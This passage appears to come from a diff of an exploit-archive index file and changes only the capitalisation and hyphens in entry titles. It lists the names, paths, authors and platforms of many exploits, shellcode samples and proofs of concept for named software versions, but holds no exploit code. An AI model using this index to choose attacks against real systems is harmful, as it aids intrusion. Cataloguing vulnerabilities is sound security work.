Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37264,platforms/php/webapps/37264.txt,"Wordpress Encrypted Contact Form Plugin 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 @@ -33715,7 +33719,7 @@ id,file,description,date,author,platform,type,port 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 -37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,Metasploit,windows,local,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 @@ -34207,8 +34211,8 @@ id,file,description,date,author,platform,type,port 37876,platforms/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37877,platforms/multiple/dos/37877.txt,"Adobe Flash - TextField.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37878,platforms/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0 -37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 -37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0 @@ -34221,7 +34225,7 @@ id,file,description,date,author,platform,type,port 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 -37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 +37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 37896,platforms/php/webapps/37896.txt,"Wordpress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 @@ -34279,7 +34283,7 @@ id,file,description,date,author,platform,type,port 37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Privilege Escalation",2012-10-18,"Nikita Tarakanov",windows,local,0 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 -37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 +37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37970,platforms/php/webapps/37970.html,"Wordpress Wordfence Security Plugin - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 @@ -34334,7 +34338,7 @@ id,file,description,date,author,platform,type,port 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote Denial of Service",2012-11-16,X-Cisadane,multiple,dos,0 38022,platforms/php/webapps/38022.txt,"Wordpress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38023,platforms/php/webapps/38023.txt,"Wordpress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 +38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - ' Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 @@ -34362,7 +34366,7 @@ id,file,description,date,author,platform,type,port 38050,platforms/php/webapps/38050.txt,"Wordpress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",php,webapps,80 38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21 -38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0 +38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,windows,dos,0 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,windows,dos,0 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 @@ -34446,7 +34450,7 @@ id,file,description,date,author,platform,type,port 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0 38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 -38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 +38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 38152,platforms/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 @@ -34686,7 +34690,7 @@ id,file,description,date,author,platform,type,port 38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 38403,platforms/win_x86/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 -38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 +38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 @@ -34696,11 +34700,11 @@ id,file,description,date,author,platform,type,port 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 38414,platforms/php/webapps/38414.txt,"Wordpress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 -38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 +38415,platforms/asp/webapps/38415.txt,"C2 WebResource - ' File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 -38419,platforms/windows/dos/38419.txt,"SmallFTPD - Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 +38419,platforms/windows/dos/38419.txt,"SmallFTPd - Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 38420,platforms/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 @@ -34761,7 +34765,7 @@ id,file,description,date,author,platform,type,port 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 -38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - '.mp3'Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 +38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 38487,platforms/php/webapps/38487.txt,"Wordpress Colormix Theme - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Path Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 @@ -34892,7 +34896,7 @@ id,file,description,date,author,platform,type,port 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 -38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 +38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38621,platforms/php/webapps/38621.txt,"Wordpress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 @@ -34928,7 +34932,7 @@ id,file,description,date,author,platform,type,port 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 -38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 +38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0 38665,platforms/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Path Traversal",2015-11-10,HaHwul,php,webapps,0 @@ -34947,10 +34951,10 @@ id,file,description,date,author,platform,type,port 38678,platforms/php/webapps/38678.txt,"Wordpress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 -38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 +38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM - /administration/ Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 -38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 +38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - Cross-Site Request Forgery Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 @@ -35141,7 +35145,7 @@ id,file,description,date,author,platform,type,port 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php User Creation Cross-Site Request Forgery",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder - (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 -38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 +38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -35244,21 +35248,21 @@ id,file,description,date,author,platform,type,port 38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38991,platforms/php/webapps/38991.pl,"Ovidentia newsletter Module 2.2 - 'admin.php' Remote File Inclusion Exploit",2015-12-16,bd0rk,php,webapps,80 -38992,platforms/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 -38993,platforms/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +38992,platforms/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +38993,platforms/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 38994,platforms/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",multiple,dos,0 38995,platforms/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 38996,platforms/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 -38997,platforms/multiple/dos/38997.txt,"Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +38997,platforms/multiple/dos/38997.txt,"Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 38998,platforms/multiple/dos/38998.txt,"Wireshark - memcpy (get_value / dissect_btatt) SIGSEGV",2015-12-16,"Google Security Research",multiple,dos,0 38999,platforms/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",multiple,dos,0 39000,platforms/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39001,platforms/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39002,platforms/multiple/dos/39002.txt,"Wireshark - addresses_equal (dissect_rsvp_common) Use-After-Free",2015-12-16,"Google Security Research",multiple,dos,0 -39003,platforms/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 -39004,platforms/multiple/dos/39004.txt,"Wireshark - find_signature Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 -39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 -39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 +39003,platforms/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +39004,platforms/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 +39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 @@ -35302,7 +35306,7 @@ id,file,description,date,author,platform,type,port 39047,platforms/windows/dos/39047.txt,"Adobe Flash TextField.replaceSel - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39048,platforms/windows/dos/39048.txt,"Adobe Flash TextField.replaceText - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39049,platforms/windows/dos/39049.txt,"Adobe Flash TextField Variable - Use-After Free",2015-12-18,"Google Security Research",windows,dos,0 -39050,platforms/windows/dos/39050.txt,"Adobe Flash TextField.variable Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 +39050,platforms/windows/dos/39050.txt,"Adobe Flash TextField.Variable Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39051,platforms/windows/dos/39051.txt,"Adobe Flash TextField.htmlText Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39052,platforms/windows/dos/39052.txt,"Adobe Flash TextField.type Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39053,platforms/windows/dos/39053.txt,"Adobe Flash TextField.text Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 @@ -35327,8 +35331,8 @@ id,file,description,date,author,platform,type,port 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0 -39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 -39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 +39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 +39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39080,platforms/php/webapps/39080.txt,"Atmail WebMail - searchResultsTab5 filter Parameter Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 @@ -35350,7 +35354,7 @@ id,file,description,date,author,platform,type,port 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 -39106,platforms/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 +39106,platforms/asp/webapps/39106.txt,"eshtery CMS - ' FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 39109,platforms/php/webapps/39109.txt,"Wordpress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 @@ -35407,10 +35411,10 @@ id,file,description,date,author,platform,type,port 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 -39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 -39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security 